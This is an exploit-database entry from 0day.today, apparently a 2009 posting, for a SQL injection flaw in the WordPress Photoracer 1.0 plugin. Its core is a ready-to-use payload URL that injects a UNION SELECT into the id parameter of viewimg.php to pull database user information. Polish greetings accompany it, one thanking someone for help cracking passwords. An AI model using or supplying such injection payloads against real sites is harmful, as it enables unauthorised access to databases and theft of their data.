[ authorization ] [ registration ] [ restore account ]
Contact us
You can contact us by:
0day Today Exploits Market and 0day Exploits Database

WordPress Plugin Photoracer 1.0 (id) SQL Injection Vulnerability

Author
Kacper
Risk
[
Security Risk Unsored
]
0day-ID
0day-ID-5377
Category
web applications
Date add
14-06-2009
Platform
unsorted
================================================================
WordPress Plugin Photoracer 1.0 (id) SQL Injection Vulnerability
================================================================


Wordpress Photoracer Plugin => SQL injection
http://wordpress.org/extend/plugins/photoracer/ 

Author: Kacper

Pozdrawiam wszystkich z huba dc++, oraz wszystkich z forum, 

Pozdro: Ratman, Kopaczka, FDJ

Elo: dla GLOBUSa za pomoc w crackowaniu hasel.

Vuln:

http://site.pl/wp-content/plugins/photoracer/viewimg.php?id=-1+union+select+0,1,2,3,4,user(),6,7,8--



#  0day.today [2024-12-24]  #